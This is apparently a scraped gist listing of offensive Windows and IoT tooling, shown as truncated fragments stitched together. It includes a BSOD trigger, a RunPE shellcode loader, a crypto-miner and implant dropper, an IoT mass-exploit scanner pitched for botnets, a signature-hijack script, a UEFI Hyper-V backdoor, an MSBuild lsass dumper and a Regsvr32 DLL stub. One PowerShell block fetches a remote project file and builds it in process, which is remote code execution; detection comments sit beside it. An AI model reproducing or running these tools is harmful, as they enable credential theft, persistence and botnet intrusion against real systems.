
// BSOD Via RtlSetProcessIsCritical by Souhardya Sardar @subversionzero
// https://www.opensc.io/showthread.php?t=12868&page=2
using System;
using System.Runtime.InteropServices;
namespace Die
{
class Program
decay88 / RunPe.cs
Created September 2, 2018 06:39
Shellcode RunPe
using System;
using System.IO;
using System.Runtime.InteropServices;
using System.Diagnostics;
// Author : Souhardya Sardar
// Date : 13/01/2017
public class RunPE
{
decay88 / wmicminer.ps1
Created September 2, 2018 06:41
Custom implant dropper
# Crypto miner dropper or you can modify it to drop your implants
# Read the code if you want to figure it out
param(
[Parameter(Position = 0)]
[string[]]$Url,
[string]$64Url
)
decay88 / MassCVE-2017-6077.py
Created September 2, 2018 06:42 — forked from Souhardya/MassCVE-2017-6077.py
CVE-2017-6077 Mass Scanner easy bots for your iot botnet
import threading
import requests
import re
import sys
#CVE LINK :- https://www.exploit-db.com/exploits/41394/
#CVE AUTHOR :- SivertPL
if len(sys.argv) < 3:
print \
decay88 / DigitalSignature-Hijack.ps1
Created September 2, 2018 06:46 — forked from netbiosX/DigitalSignature-Hijack.ps1
Hijack Digital Signatures and Bypass Authenticode Hash Validation
<#
DigitalSignatureHijack v1.0
License: GPLv3
Author: @netbiosX
#>
# Validate Digital Signature for PowerShell Scripts
function ValidateSignaturePS
{
$ValidateHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' +'\OID\EncodingType 0\CryptSIPDllVerifyIndirectData'
decay88 / base64_encode.js
Last active September 2, 2018 10:08 — forked from mrpapercut/base64_encode.js
base64_encoder.js
// Standard Base64 alphabet (RFC 4648 ordering): index 0-25 upper case,
// 26-51 lower case, 52-61 digits, then '+' and '/'.
const base64_chars = [
    'ABCDEFGHIJKLMNOPQRSTUVWXYZ',
    'abcdefghijklmnopqrstuvwxyz',
    '0123456789+/',
].join('');
const base64_encode = (input) => {
let length = input.length;
let [i, j, k, s] = [0, 0, 0, 0];
let char_array_3 = new Array(3);
decay88 / DmaHvBackdoor.c
Created September 2, 2018 17:38
Hyper-V backdoor for UEFI
/*
*********************************************************************
Part of UEFI DXE driver code that injects Hyper-V VM exit handler
backdoor into the Device Guard enabled Windows 10 Enterprise.
Execution starts from new_ExitBootServices() -- a hook handler
for EFI_BOOT_SERVICES.ExitBootServices(), which is called by
winload!OslFwpKernelSetupPhase1(). After DXE phase exit, winload.efi
transfers execution to the previously loaded Hyper-V kernel (hvix64.sys)
decay88 / MSBuildProcDumper.csproj
Created September 2, 2018 17:44
MSBuild - Process Dumper - lsass example
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe MSBuildProcDumper.csproj -->
<!-- Feel free to use a more aggressive class for testing. -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
# Visible lines: an in-process MSBuild run of a project file fetched over HTTPS.
# NOTE(review): the remote test.csproj is not shown on this page; if it defines
# inline tasks, their code would run inside this PowerShell process -- confirm
# the file's content before running this anywhere.
# Detection: msbuild.exe never appears on a command line in this flow, so rely on
# PowerShell script block logging (event 4104) and alert on
# Microsoft.Build.Evaluation.Project being used from PowerShell, together with
# outbound requests from PowerShell hosts to raw gist URLs.

# Load the Microsoft.Build assembly by partial name so its types resolve below.
[Reflection.Assembly]::LoadWithPartialName('Microsoft.Build');
# Open an XmlReader directly on the remote URL; these lines write nothing to disk.
$proj = [System.Xml.XmlReader]::create("https://gist.githubusercontent.com/bohops/a29a69cf127ffb0e37622d25b9f79157/raw/35fa4c5a0d2db037220f224b5c4c269ea243b3bd/test.csproj");
# Evaluate the downloaded XML as an MSBuild project object.
$e=new-object Microsoft.Build.Evaluation.Project($proj);
# Build the project's default targets.
$e.Build();
decay88 / evil.cs
Created September 2, 2018 18:14
Execute a DLL via Regsvr32
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;
namespace Export
{
class Test
{